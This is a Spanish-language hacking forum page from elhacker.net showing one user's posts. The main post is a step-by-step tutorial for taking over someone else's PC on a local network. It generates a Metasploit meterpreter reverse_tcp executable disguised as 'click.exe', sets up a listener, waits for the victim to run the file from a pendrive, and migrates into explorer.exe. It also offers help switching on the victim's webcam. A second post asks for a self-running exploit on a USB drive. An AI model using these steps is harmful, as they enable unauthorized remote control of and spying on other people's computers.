elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: 1 2 [3]
21  Seguridad Informática / Hacking / Como entrar a la pc de alguien mas en una red local en: 17 Enero 2014, 20:29 pm
Saludos a todos, hoy les voy a explicar como entrar a otra pc usando meterpreter.

Para esto necesitamos la herramienta BackTrack 5


1.) Abrimos una termina e iniciamos la sesión en metasploit framework y colocamos el payload que nos dará la sesión en meterpreter, nuestro ip y creamos el exploit con el nombre de click.exe,




root@bt:~# msfconsole





MMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMM
MMMMMMMMMMM                                 MMMMMMMMMMM
MMMN$                                                           vMMMMM                     
MMMNl     MMMMM                              MMMMM     JMMMM
MMMNl     MMMMMMMN                 NMMMMMMM     JMMMM
MMMNl     MMMMMMMMMNmmmMMNMMMMMMN     JMMMM
MMMNI    MMMMMMMMMMMMMMMMMMMMMMM       jMMMM
MMMNI    MMMMMMMMMMMMMMMMMMMMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM 
MMMNR   #MMMM       MMMMMMM       MMMM#      dMMMM
MMMMNm ?MMNM                              MMMMN    dMMMMM
MMMMMMN  ´?MM                              MMMM   NMMMMMM
MMMMMMNe  ?NM                              MM?   jMMMMMMMM
MMMMMMMMNm,                                   eMMMMMMMMMM
MMMMMMMMMMNx                            MMMMMMMMMMMMM
MMMMMMMMMMMMMMMm+...+mMMMMMMMMMMMMMMMM


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --
=[ 927 exploits - 499 auxiliary - 151 post+ -- --
=[ 251 payloads - 28 encoders - 8 nops



msf > msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe


  • exec: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options:
{"LHOST"=>"192.168.1.100", "LPORT"=>"4444"}

msf >



2.) Luego ponemos nuestra pc a que escuche el exploit con el payload que creamos, y nuestra dirección ip



msf > use exploit/multi/handler

msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(handler) > set lhost 192.168.1.100

lhost => 192.168.1.100

msf  exploit(handler) >



3.) Iniciamos el exploit y esperamos a que la victima ejecute el exploit que ya fue pasado a su pc por un pendrive o lo bajo desde un servidor local



msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.1.100:4444
  • Starting the payload handler...



4.) Una vez la victima haya iniciando el exploit, nos cambiamos de proceso a Explorer.exe que en mi caso es el PID 1832. Para saber cual es el PID escriben "ps"



msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.1.100:4444
  • Starting the payload handler...
  • Sending stage (752128 bytes) to 192.168.1.104
  • Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.104:1171) at 2014-01-17 08:02:51 -0500

meterpreter > migrate 1832
  • Migrating to 1832...
  • Migration completed successfully.

meterpreter >



5.) Ahora la pc es nuestra, escribimos "help" podemos ver todas las cosas que podemos hacer.

si te interesa saber como encender una cámara web escríbeme un mensaje

PD: la M de Metasploit la hice yo XD
22  Seguridad Informática / Hacking / ¿Se puede crear o hay un exploit autoejecutable? en: 22 Diciembre 2013, 01:56 am
Inicio este tema con una duda, es que quisiera saber si, ¿se puede crear o hay un exploit en formato .exe autoejecutable? que se pueda poner en una unidad extraible como un pendrive. para realizar unas pruebas con el Backtrack
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines